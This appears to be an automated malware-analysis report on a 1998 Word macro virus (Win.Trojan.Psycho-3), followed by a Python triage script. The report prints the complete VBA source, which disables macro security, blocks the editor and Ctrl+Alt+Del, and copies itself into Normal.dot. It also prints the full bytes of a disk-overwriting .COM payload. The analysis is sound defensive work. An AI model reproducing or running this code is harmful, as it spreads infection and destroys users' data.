Verdict: MALICIOUS (risk score 140)
Malware Insights
MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1562.001 Impair Defenses: Disable or Modify Tools
The sample's `Document_Close` handler first strips the host's defences: it sets `Options.VirusProtection = 0`, writes `Level = 1` (Low) to `HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security` (Word 2000 macro security), disables the Alt+F8 (Macros dialog) and Alt+F11 (VBA editor) keys, hides the Control Toolbox and item 12 of the Tools menu, and calls `SystemParametersInfoA(97, 1, ...)` (SPI_SETSCREENSAVERRUNNING), which on Windows 9x blocks Ctrl+Alt+Del while the macro runs; the flag is cleared again at the end of the routine. On trigger dates (month number equal to day of month, or day of month equal to the VBA weekday number, which only happens during the first week of a month that starts on a Sunday) it writes a 28-byte array to a .COM file in the root of C: (the single-character file name did not survive extraction) and launches it with `Shell`. Those bytes are 16-bit real-mode code: `mov ax,0301h` / `mov dl,80h` followed by a far call to 0070:03EE inside an endless loop, i.e. repeated one-sector disk writes to the first hard disk through the DOS IO.SYS segment rather than INT 13h, a disk-trashing payload written for DOS/Windows 9x. Independently of the date, the macro copies the first 50 lines of its own module into the registry with `SaveSetting` and, through `VBProject.VBComponents(1).CodeModule`, replaces the code of both Normal.dot (after clearing its read-only attribute) and the active document with that copy, marking infected projects with `HelpContextID = 7`. That self-replication makes the sample a macro virus with a destructive payload rather than a plain dropper; the ClamAV name Win.Trojan.Psycho-3 identifies the family. Two practical caveats: the `Put #1, ι, ν` loop starts at position 0, which VBA treats as a bad record number (binary positions are 1-based) and `On Error Resume Next` swallows, so the dropped file probably lacks the leading CLI byte (the relative jump still works); and on NT-based Windows the .COM payload would only run inside NTVDM on 32-bit systems, where raw sector writes are not possible.
Heuristics (3)
- ClamAV: Win.Trojan.Psycho-3 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.Psycho-3
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2465 bytes | 433d950e33c183dc9b1860eca460ebaea3e4b8c17cc3a52a1bb8c9dbbf07a142 |
Preview: first 1,000 lines of the extracted script
```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Copyright (C) 1998 by FlyShadow ~^^~ - Spoony
Private Declare Function SystemParametersInfoA Lib "user32" (ByVal uAction As Long, ByVal uParam As Long, ByVal lpvParam As Any, ByVal fuWinIni As Long) As Long
Private Sub Document_Close(): Dim ν As Byte
On Error Resume Next
υ = ActiveDocument.Saved
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
Application.DisplayAlerts = 0
Options.ConfirmConversions = 0
Application.EnableCancelKey = 0
SystemParametersInfoA 97, 1, "", 0
CustomizationContext = MacroContainer
CommandBars("Control Toolbox").Enabled = 0
CommandBars("Tools").Controls(12).Visible = 0
FindKey(BuildKeyCode(wdKeyAlt, wdKeyF8)).Disable
FindKey(BuildKeyCode(wdKeyAlt, wdKeyF11)).Disable
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
If Month(Now) Like Day(Now) Or Day(Now) Like WeekDay(Now) Then _
κ = Array(&HFA, &H33, &HC9, &H8B, &HD1, &HFE, &HC1, &H80, &HD6, &H0, &HA, &HC9, &H75, &H2, &HFE, &HC1, &HB2, &H80, &HB8, &H1, &H3, &H9A, &HEE, &H3, &H70, &H0, &HEB, &HE9): _
Open "C:\�.COM" For Binary As #1: For ι = 0 To 27: ν = κ(ι): Put #1, ι, ν: Next: Close: Shell "C:\�.COM", 0
If GetAttr(NormalTemplate.FullName) Mod 2 Then SetAttr NormalTemplate.FullName, 0
If GetSetting("'", "'", "'") Like "" Then SaveSetting "'", "'", "'", ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 50)
If GetAttr(NormalTemplate.FullName) Then
With NormalTemplate.VBProject
If Not .Protection And .HelpContextID <> 7 Then
.VBComponents(1).CodeModule.DeleteLines 1, .VBComponents(1).CodeModule.CountOfLines
.VBComponents(1).CodeModule.AddFromString GetSetting("'", "'", "'")
.HelpContextID = 7
End If: End With: End If
If Len(ActiveDocument.Path) Then
With ActiveDocument.VBProject
If Not .Protection And .HelpContextID <> 7 Then
.VBComponents(1).CodeModule.DeleteLines 1, .VBComponents(1).CodeModule.CountOfLines
.VBComponents(1).CodeModule.AddFromString GetSetting("'", "'", "'")
.HelpContextID = 7
If Not ActiveDocument.ReadOnly Then ActiveDocument.SaveAs ActiveDocument.FullName
End If: End With: End If
SystemParametersInfoA 97, 0, "", 0
ActiveDocument.Saved = υ
End Sub
```
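The following triage script is an added example written for this report; it is not part of the analyzer's own tooling or of the sample. It re-implements by hand three checks that the summary above describes: a regex pass over the decoded macro source for the defence-disabling and self-replication statements, extraction and decoding of the `Array(&H..)` payload with a narrow check for the 16-bit BIOS sector-write idiom (`mov ax,0301h`, `mov dl,80h`, far call), and an enumeration of the dates on which the `Month(Now) Like Day(Now) Or Day(Now) Like WeekDay(Now)` trigger fires for a given year, which goes beyond the page by listing every trigger date rather than the rule alone. The embedded `VBA_SAMPLE` is a constructed excerpt of the preview lines above in which the unrecoverable one-character file name is replaced with the placeholder `DROP.COM`; the indicator names and the MITRE mapping in the comments are the editor's own.

```python
"""Triage helper for the extracted macro above (added example, not analyzer code)."""
import datetime as dt
import re

# Constructed excerpt of the extracted macros.bas preview. The dropped file's
# single-character name did not survive extraction, so DROP.COM stands in for it.
VBA_SAMPLE = r'''
Options.VirusProtection = 0
Application.EnableCancelKey = 0
SystemParametersInfoA 97, 1, "", 0
FindKey(BuildKeyCode(wdKeyAlt, wdKeyF8)).Disable
FindKey(BuildKeyCode(wdKeyAlt, wdKeyF11)).Disable
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
If Month(Now) Like Day(Now) Or Day(Now) Like WeekDay(Now) Then _
κ = Array(&HFA, &H33, &HC9, &H8B, &HD1, &HFE, &HC1, &H80, &HD6, &H0, &HA, &HC9, &H75, &H2, &HFE, &HC1, &HB2, &H80, &HB8, &H1, &H3, &H9A, &HEE, &H3, &H70, &H0, &HEB, &HE9): _
Open "C:\DROP.COM" For Binary As #1: For ι = 0 To 27: ν = κ(ι): Put #1, ι, ν: Next: Close: Shell "C:\DROP.COM", 0
.VBComponents(1).CodeModule.AddFromString GetSetting("'", "'", "'")
'''

# Indicator names are the editor's own labels; each pattern matches one
# statement visible in the macro (T1562.001 for the first four, T1059.005
# for the Shell call, self-replication via the VBA project object model).
INDICATORS = [
    ("macro_security_off", r'Options\.VirusProtection\s*=\s*0'),
    ("security_level_low", r'Office\\9\.0\\Word\\Security.*"Level"\)\s*=\s*1'),
    ("macro_editor_blocked", r'wdKeyF(8|11)\)\)\.Disable'),
    ("ctrl_alt_del_off", r'SystemParametersInfoA\s+97,\s*1'),
    ("shell_exec", r'\bShell\s+"'),
    ("self_replication", r'CodeModule\.AddFromString'),
]


def find_indicators(src):
    """Return the names of all INDICATORS whose pattern occurs in src."""
    return [name for name, pat in INDICATORS if re.search(pat, src)]


def extract_payload(src):
    """Decode the first `Array(&H.., &H..)` literal in src into bytes, or None."""
    m = re.search(r'Array\(((?:\s*&H[0-9A-Fa-f]+\s*,?)+)\)', src)
    if not m:
        return None
    return bytes(int(tok, 16) for tok in re.findall(r'&H([0-9A-Fa-f]+)', m.group(1)))


def classify_payload(code):
    """Narrow 16-bit x86 check for the BIOS sector-write idiom.

    B8 01 03 = mov ax,0301h (AH=03h write sectors, AL=1 sector)
    B2 80    = mov dl,80h   (first hard disk)
    9A lo hi lo hi = far call seg:off (this sample calls 0070:03EE, not INT 13h)
    """
    notes = []
    if code.startswith(b"\xfa"):
        notes.append("cli")
    if b"\xb8\x01\x03" in code:
        notes.append("ah=03h write sectors")
    if b"\xb2\x80" in code:
        notes.append("dl=80h first hard disk")
    i = code.find(b"\x9a")
    if i != -1 and i + 5 <= len(code):
        off = int.from_bytes(code[i + 1:i + 3], "little")
        seg = int.from_bytes(code[i + 3:i + 5], "little")
        notes.append(f"far call {seg:04X}:{off:04X}")
    return notes


def vba_weekday(d):
    """VBA Weekday() with its default vbSunday: Sunday=1 ... Saturday=7."""
    return (d.weekday() + 1) % 7 + 1


def trigger_dates(year):
    """(month, day) pairs on which the macro's date condition is true.

    `Like` on two numbers compares their string forms, so the condition is
    month == day  or  day == weekday number.
    """
    out = []
    d = dt.date(year, 1, 1)
    while d.year == year:
        if d.month == d.day or d.day == vba_weekday(d):
            out.append((d.month, d.day))
        d += dt.timedelta(days=1)
    return out


def triage(src):
    """Run all three checks over a decoded VBA source string."""
    payload = extract_payload(src)
    return {
        "indicators": find_indicators(src),
        "payload_len": len(payload) if payload else 0,
        "payload_notes": classify_payload(payload) if payload else [],
    }


if __name__ == "__main__":
    print(triage(VBA_SAMPLE))
    print("trigger dates 2024:", trigger_dates(2024))
```

Run it on any olevba output (`olevba --decode sample.doc`) by passing the decoded text to `triage`; the indicator pass is deliberately literal so that it only fires on the statements this family uses, and the payload check should be read as a pattern match for this idiom, not a disassembler.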